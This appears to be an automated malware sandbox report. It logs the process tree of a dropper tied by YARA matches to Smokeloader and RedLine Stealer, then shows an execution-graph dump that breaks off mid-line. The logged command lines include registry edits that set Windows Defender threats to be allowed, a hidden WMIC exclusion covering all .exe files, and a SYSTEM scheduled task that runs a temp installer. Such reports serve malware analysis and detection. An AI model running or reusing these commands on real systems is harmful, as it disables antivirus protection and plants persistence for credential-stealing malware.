                                                      Target ID:23
                                                      Start time:05:29:06
                                                      Start date:24/05/2024
                                                      Path:C:\Windows\SysWOW64\forfiles.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                      Imagebase:0xa20000
                                                      File size:41'472 bytes
                                                      MD5 hash:D95C443851F70F77427B3183B1619DD3
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:24
                                                      Start time:05:29:06
                                                      Start date:24/05/2024
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                      Imagebase:0x410000
                                                      File size:236'544 bytes
                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:25
                                                      Start time:05:29:06
                                                      Start date:24/05/2024
                                                      Path:C:\Windows\SysWOW64\reg.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                      Imagebase:0x40000
                                                      File size:59'392 bytes
                                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:26
                                                      Start time:05:29:07
                                                      Start date:24/05/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                      Imagebase:0x7ff7b4ee0000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:27
                                                      Start time:05:29:07
                                                      Start date:24/05/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\svchost.exe -k NetSvcs -p -s NcaSvc
                                                      Imagebase:0x7ff7b4ee0000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:28
                                                      Start time:05:29:07
                                                      Start date:24/05/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                      Imagebase:0x7ff7b4ee0000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:29
                                                      Start time:05:29:07
                                                      Start date:24/05/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\svchost.exe -k LocalService -s W32Time
                                                      Imagebase:0x7ff7b4ee0000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:30
                                                      Start time:05:29:07
                                                      Start date:24/05/2024
                                                      Path:C:\Windows\SysWOW64\forfiles.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                                      Imagebase:0xa20000
                                                      File size:41'472 bytes
                                                      MD5 hash:D95C443851F70F77427B3183B1619DD3
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:31
                                                      Start time:05:29:07
                                                      Start date:24/05/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff75da10000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:32
                                                      Start time:05:29:07
                                                      Start date:24/05/2024
                                                      Path:C:\Windows\SysWOW64\forfiles.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                      Imagebase:0xa20000
                                                      File size:41'472 bytes
                                                      MD5 hash:D95C443851F70F77427B3183B1619DD3
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:33
                                                      Start time:05:29:07
                                                      Start date:24/05/2024
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                      Imagebase:0x410000
                                                      File size:236'544 bytes
                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:34
                                                      Start time:05:29:07
                                                      Start date:24/05/2024
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                      Imagebase:0x410000
                                                      File size:236'544 bytes
                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:35
                                                      Start time:05:29:07
                                                      Start date:24/05/2024
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                      Imagebase:0x150000
                                                      File size:433'152 bytes
                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:36
                                                      Start time:05:29:07
                                                      Start date:24/05/2024
                                                      Path:C:\Windows\explorer.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\Explorer.EXE
                                                      Imagebase:0x7ff70ffd0000
                                                      File size:5'141'208 bytes
                                                      MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:37
                                                      Start time:05:29:07
                                                      Start date:24/05/2024
                                                      Path:C:\Windows\SysWOW64\reg.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                      Imagebase:0x40000
                                                      File size:59'392 bytes
                                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:38
                                                      Start time:05:29:07
                                                      Start date:24/05/2024
                                                      Path:C:\Users\user\Pictures\E6ijlcXzCqRG7r61JO0b9evs.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Pictures\E6ijlcXzCqRG7r61JO0b9evs.exe"
                                                      Imagebase:0x400000
                                                      File size:223'744 bytes
                                                      MD5 hash:C5A6381354CD5D1488E362C9103C1851
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000026.00000002.2581381822.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000026.00000002.2621741485.0000000002E5B000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                      Has exited:false

                                                      Target ID:39
                                                      Start time:05:29:08
                                                      Start date:24/05/2024
                                                      Path:C:\Windows\SysWOW64\forfiles.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                      Imagebase:0xa20000
                                                      File size:41'472 bytes
                                                      MD5 hash:D95C443851F70F77427B3183B1619DD3
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:40
                                                      Start time:05:29:08
                                                      Start date:24/05/2024
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                      Imagebase:0x410000
                                                      File size:236'544 bytes
                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:41
                                                      Start time:05:29:08
                                                      Start date:24/05/2024
                                                      Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                      Imagebase:0xae0000
                                                      File size:427'008 bytes
                                                      MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:42
                                                      Start time:05:29:08
                                                      Start date:24/05/2024
                                                      Path:C:\Windows\SysWOW64\reg.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                      Imagebase:0x40000
                                                      File size:59'392 bytes
                                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:43
                                                      Start time:05:29:08
                                                      Start date:24/05/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                      Imagebase:0x7ff7b4ee0000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:44
                                                      Start time:05:29:09
                                                      Start date:24/05/2024
                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 8028 -ip 8028
                                                      Imagebase:0x250000
                                                      File size:483'680 bytes
                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:45
                                                      Start time:05:29:09
                                                      Start date:24/05/2024
                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 8028 -s 356
                                                      Imagebase:0x250000
                                                      File size:483'680 bytes
                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:46
                                                      Start time:05:29:09
                                                      Start date:24/05/2024
                                                      Path:C:\Windows\SysWOW64\forfiles.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                      Imagebase:0xa20000
                                                      File size:41'472 bytes
                                                      MD5 hash:D95C443851F70F77427B3183B1619DD3
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:47
                                                      Start time:05:29:09
                                                      Start date:24/05/2024
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                      Imagebase:0x410000
                                                      File size:236'544 bytes
                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:48
                                                      Start time:05:29:09
                                                      Start date:24/05/2024
                                                      Path:C:\Windows\SysWOW64\reg.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                      Imagebase:0x40000
                                                      File size:59'392 bytes
                                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:49
                                                      Start time:05:29:10
                                                      Start date:24/05/2024
                                                      Path:C:\Windows\SysWOW64\forfiles.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                      Imagebase:0xa20000
                                                      File size:41'472 bytes
                                                      MD5 hash:D95C443851F70F77427B3183B1619DD3
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:50
                                                      Start time:05:29:10
                                                      Start date:24/05/2024
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                      Imagebase:0x410000
                                                      File size:236'544 bytes
                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:51
                                                      Start time:05:29:10
                                                      Start date:24/05/2024
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                      Imagebase:0x150000
                                                      File size:433'152 bytes
                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:52
                                                      Start time:05:29:10
                                                      Start date:24/05/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                      Imagebase:0x7ff7b4ee0000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:53
                                                      Start time:05:29:12
                                                      Start date:24/05/2024
                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 05:30:00 /RU "SYSTEM" /TR "\"C:\Users\user~1\AppData\Local\Temp\7zSA05C.tmp\Install.exe\" it /fMDdidlBgf 385118 /S" /V1 /F
                                                      Imagebase:0x700000
                                                      File size:187'904 bytes
                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:54
                                                      Start time:05:29:12
                                                      Start date:24/05/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff75da10000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Reset < >

                                                        Execution Graph

                                                        Execution Coverage:5.8%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:26.1%
                                                        Total number of Nodes:1019
                                                        Total number of Limit Nodes:27
                                                        execution_graph 17015 7ff7e35a0560 17016 7ff7e35a059d 17015->17016 17018 7ff7e35a05c7 17015->17018 17019 7ff7e3581e90 17016->17019 17020 7ff7e3581ec7 GetCurrentProcess 17019->17020 17021 7ff7e3581f7f GlobalMemoryStatusEx 17019->17021 17022 7ff7e3581ee0 17020->17022 17024 7ff7e3581ee8 17021->17024 17022->17021 17022->17024 17026 7ff7e35d8e50 17024->17026 17027 7ff7e35d8e59 17026->17027 17028 7ff7e3582058 17027->17028 17029 7ff7e35d983c IsProcessorFeaturePresent 17027->17029 17028->17018 17030 7ff7e35d9854 17029->17030 17035 7ff7e35d9910 RtlCaptureContext 17030->17035 17036 7ff7e35d992a RtlLookupFunctionEntry 17035->17036 17037 7ff7e35d9940 RtlVirtualUnwind 17036->17037 17038 7ff7e35d9867 17036->17038 17037->17036 17037->17038 17039 7ff7e35d9808 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17038->17039 17040 7ff7e35964a0 17041 7ff7e35964d7 17040->17041 17043 7ff7e35964f9 _swprintf_c_l 17041->17043 17048 7ff7e35b0440 17041->17048 17044 7ff7e35965e0 17043->17044 17055 7ff7e35827d0 VirtualFree 17043->17055 17046 7ff7e35965a5 17046->17044 17047 7ff7e35965b3 EnterCriticalSection LeaveCriticalSection 17046->17047 17047->17044 17056 7ff7e35827d0 VirtualFree 17048->17056 17050 7ff7e35b045a 17051 7ff7e35b04a4 17050->17051 17052 7ff7e35b046b EnterCriticalSection 17050->17052 17051->17043 17053 7ff7e35b0495 LeaveCriticalSection 17052->17053 17054 7ff7e35b048e 17052->17054 17053->17051 17054->17053 17055->17046 17056->17050 17840 7ff7e3588412 17841 7ff7e3588418 17840->17841 17866 7ff7e3599230 17841->17866 17844 7ff7e3588454 17870 7ff7e3582690 QueryPerformanceCounter 17844->17870 17847 7ff7e3588472 17871 7ff7e357a2e0 17847->17871 17850 7ff7e35885b5 17857 7ff7e35884d5 17850->17857 17887 7ff7e3599f60 17850->17887 17853 7ff7e35885fa 17853->17857 17908 7ff7e359d760 17853->17908 17855 7ff7e35887e0 17856 7ff7e3599230 SwitchToThread 17855->17856 17859 7ff7e35887eb 17856->17859 17857->17855 17861 7ff7e3588764 17857->17861 17916 7ff7e3582690 QueryPerformanceCounter 17857->17916 17863 7ff7e358880e 17859->17863 17925 7ff7e35826e0 SetEvent 17859->17925 17917 7ff7e3579f80 17861->17917 17926 7ff7e3579550 17863->17926 17865 7ff7e358883f 17867 7ff7e3588436 17866->17867 17869 7ff7e359924f 17866->17869 17867->17844 17881 7ff7e35826d0 ResetEvent 17867->17881 17868 7ff7e3599291 SwitchToThread 17868->17869 17869->17867 17869->17868 17870->17847 17872 7ff7e357a2f5 17871->17872 17875 7ff7e357a358 17872->17875 17939 7ff7e357ac10 EventEnabled 17872->17939 17874 7ff7e357a32f 17874->17875 17940 7ff7e357a4a0 EventWrite 17874->17940 17931 7ff7e3574fa0 17875->17931 17879 7ff7e357a3ac 17879->17850 17879->17857 17882 7ff7e3599460 17879->17882 17885 7ff7e3599480 17882->17885 17883 7ff7e359d760 11 API calls 17883->17885 17884 7ff7e35994ea 17884->17850 17885->17883 17885->17884 17958 7ff7e359d010 17885->17958 17892 7ff7e3599f75 17887->17892 17888 7ff7e3599f79 17888->17853 17889 7ff7e359a05d 17890 7ff7e358d020 24 API calls 17889->17890 17893 7ff7e359a06f 17890->17893 17891 7ff7e359a074 17894 7ff7e359e5b0 2 API calls 17891->17894 17892->17888 17892->17889 17892->17891 17893->17888 17897 7ff7e3593d20 7 API calls 17893->17897 17902 7ff7e359a110 17893->17902 17895 7ff7e359a09a 17894->17895 17895->17893 17896 7ff7e359a0b1 EnterCriticalSection LeaveCriticalSection 17895->17896 17896->17893 17898 7ff7e359a0f6 17897->17898 17900 7ff7e359a0fa 17898->17900 17898->17902 17899 7ff7e359a1b8 DebugBreak 17901 7ff7e359a1c7 17899->17901 17903 7ff7e35964a0 5 API calls 17900->17903 17901->17888 17907 7ff7e359a1db DebugBreak 17901->17907 17902->17899 17904 7ff7e359a17b DebugBreak 17902->17904 17905 7ff7e359a198 DebugBreak 17902->17905 17906 7ff7e359a1af 17902->17906 17903->17888 17904->17902 17905->17902 17906->17899 17906->17901 17907->17888 17910 7ff7e359d776 17908->17910 17909 7ff7e359d7a7 17909->17857 17910->17909 17911 7ff7e359d810 17910->17911 17912 7ff7e357de30 4 API calls 17910->17912 18034 7ff7e35b02e0 17911->18034 17912->17911 17915 7ff7e357de30 4 API calls 17915->17909 17916->17861 17918 7ff7e3579f8d 17917->17918 17922 7ff7e3579fbf 17917->17922 18045 7ff7e357ac10 EventEnabled 17918->18045 17920 7ff7e3579fa0 17920->17922 18046 7ff7e357a450 EventWrite 17920->18046 17924 7ff7e357a00e 17922->17924 18049 7ff7e357ac10 EventEnabled 17922->18049 17924->17855 17927 7ff7e3579558 17926->17927 17928 7ff7e35767b0 17926->17928 17927->17865 17929 7ff7e357fada 17928->17929 17930 7ff7e357fae1 SetEvent 17928->17930 17929->17865 17930->17865 17932 7ff7e3574fdf 17931->17932 17933 7ff7e3575004 FlushProcessWriteBuffers 17932->17933 17935 7ff7e3575030 17933->17935 17934 7ff7e3575103 17934->17879 17943 7ff7e357ac10 EventEnabled 17934->17943 17935->17934 17936 7ff7e3575069 17935->17936 17937 7ff7e357509e SwitchToThread 17935->17937 17936->17935 17944 7ff7e3575d00 17936->17944 17937->17935 17939->17874 17941 7ff7e35d8e50 8 API calls 17940->17941 17942 7ff7e357a50a 17941->17942 17942->17875 17943->17879 17945 7ff7e3575d27 17944->17945 17946 7ff7e3575d07 17944->17946 17945->17936 17946->17945 17947 7ff7e357ad5e 17946->17947 17948 7ff7e357ad32 LoadLibraryExW GetProcAddress 17946->17948 17949 7ff7e357adba SuspendThread 17947->17949 17950 7ff7e357ae08 17947->17950 17956 7ff7e357ada4 GetLastError 17947->17956 17948->17947 17949->17950 17951 7ff7e357adc8 GetThreadContext 17949->17951 17952 7ff7e35d8e50 8 API calls 17950->17952 17953 7ff7e357adff ResumeThread 17951->17953 17955 7ff7e357ade2 17951->17955 17954 7ff7e357ae18 17952->17954 17953->17950 17954->17936 17955->17953 17956->17950 17957 7ff7e357adaf 17956->17957 17957->17949 17968 7ff7e359ceb0 17958->17968 17960 7ff7e359d021 17961 7ff7e359d106 DebugBreak 17960->17961 17963 7ff7e359d0c9 DebugBreak 17960->17963 17964 7ff7e359d0e6 DebugBreak 17960->17964 17965 7ff7e359d138 17960->17965 17966 7ff7e359d0fd 17960->17966 17962 7ff7e359d115 17961->17962 17962->17965 17967 7ff7e359d129 DebugBreak 17962->17967 17963->17960 17964->17960 17965->17885 17966->17961 17966->17962 17967->17965 17973 7ff7e359ced2 17968->17973 17969 7ff7e359cf25 17979 7ff7e358d020 17969->17979 17971 7ff7e359cf40 17972 7ff7e359e5b0 2 API calls 17971->17972 17976 7ff7e359cf62 17972->17976 17973->17969 17973->17971 17974 7ff7e359cff5 17974->17960 17977 7ff7e359cfb2 EnterCriticalSection LeaveCriticalSection 17976->17977 17978 7ff7e359cf38 17976->17978 17977->17978 17978->17974 17986 7ff7e359f360 17978->17986 17980 7ff7e358d049 17979->17980 17982 7ff7e358d177 17980->17982 18005 7ff7e35a4a40 17980->18005 17983 7ff7e358d2ff 17982->17983 17984 7ff7e35a1470 9 API calls 17982->17984 17983->17978 17985 7ff7e358d326 17984->17985 17985->17978 17985->17985 17987 7ff7e359f415 17986->17987 17988 7ff7e359f379 17986->17988 17987->17974 18009 7ff7e3593d20 17988->18009 17990 7ff7e359f3fb 17991 7ff7e35964a0 5 API calls 17990->17991 17993 7ff7e359f408 17991->17993 17993->17974 17994 7ff7e359f39c 17995 7ff7e359f3a1 17994->17995 17996 7ff7e359f3de 17994->17996 17997 7ff7e359f3c1 17995->17997 17998 7ff7e359f3a6 17995->17998 17999 7ff7e35964a0 5 API calls 17996->17999 18001 7ff7e35964a0 5 API calls 17997->18001 18015 7ff7e35964a0 17998->18015 18002 7ff7e359f3ee 17999->18002 18004 7ff7e359f3d1 18001->18004 18002->17974 18003 7ff7e359f3b4 18003->17974 18004->17974 18007 7ff7e35a4a59 18005->18007 18008 7ff7e35a4aa4 18005->18008 18006 7ff7e359f8f0 18 API calls 18006->18007 18007->18006 18007->18008 18008->17982 18010 7ff7e3593de4 18009->18010 18011 7ff7e3593d60 18009->18011 18010->17987 18010->17990 18010->17994 18011->18010 18023 7ff7e3593c20 18011->18023 18014 7ff7e3593c20 7 API calls 18014->18010 18016 7ff7e35964d7 18015->18016 18017 7ff7e35b0440 3 API calls 18016->18017 18018 7ff7e35964f9 _swprintf_c_l 18016->18018 18017->18018 18019 7ff7e35965e0 18018->18019 18033 7ff7e35827d0 VirtualFree 18018->18033 18019->18003 18021 7ff7e35965a5 18021->18019 18022 7ff7e35965b3 EnterCriticalSection LeaveCriticalSection 18021->18022 18022->18019 18024 7ff7e3593cb1 18023->18024 18025 7ff7e3593c63 EnterCriticalSection 18023->18025 18028 7ff7e3582740 3 API calls 18024->18028 18026 7ff7e3593c80 18025->18026 18027 7ff7e3593c8d LeaveCriticalSection 18025->18027 18026->18027 18029 7ff7e3593cf1 LeaveCriticalSection 18026->18029 18027->18024 18030 7ff7e3593cc2 18028->18030 18031 7ff7e3593cfd 18029->18031 18030->18031 18032 7ff7e3593cd0 EnterCriticalSection 18030->18032 18031->18010 18031->18014 18032->18029 18033->18021 18035 7ff7e35b03a5 18034->18035 18036 7ff7e35b0319 EnterCriticalSection 18034->18036 18037 7ff7e3582740 3 API calls 18035->18037 18041 7ff7e359d839 18035->18041 18040 7ff7e35b0339 LeaveCriticalSection 18036->18040 18039 7ff7e35b03d6 18037->18039 18039->18041 18042 7ff7e35b03e7 EnterCriticalSection 18039->18042 18040->18035 18041->17909 18041->17915 18043 7ff7e35b0406 18042->18043 18044 7ff7e35b040d LeaveCriticalSection 18042->18044 18043->18044 18044->18041 18045->17920 18047 7ff7e35d8e50 8 API calls 18046->18047 18048 7ff7e357a499 18047->18048 18048->17922 18049->17924 17057 7ff7e35723f9 17059 7ff7e3572438 17057->17059 17058 7ff7e357249c 17059->17058 17064 7ff7e35725d0 17059->17064 17065 7ff7e357268b 17064->17065 17070 7ff7e362ca50 17065->17070 17071 7ff7e362ca62 17070->17071 17074 7ff7e362cb00 17071->17074 17073 7ff7e362caa1 17085 7ff7e3578700 17074->17085 17076 7ff7e362cc0c 17105 7ff7e3573960 17076->17105 17077 7ff7e362cb7a 17077->17076 17109 7ff7e3578830 17077->17109 17080 7ff7e3578700 10 API calls 17081 7ff7e362cc6b 17080->17081 17083 7ff7e362ccba 17081->17083 17084 7ff7e3578830 16 API calls 17081->17084 17083->17073 17084->17081 17086 7ff7e3578742 17085->17086 17087 7ff7e3578787 17086->17087 17088 7ff7e3578747 17086->17088 17090 7ff7e35787a1 17087->17090 17092 7ff7e357de30 4 API calls 17087->17092 17089 7ff7e3578761 17088->17089 17117 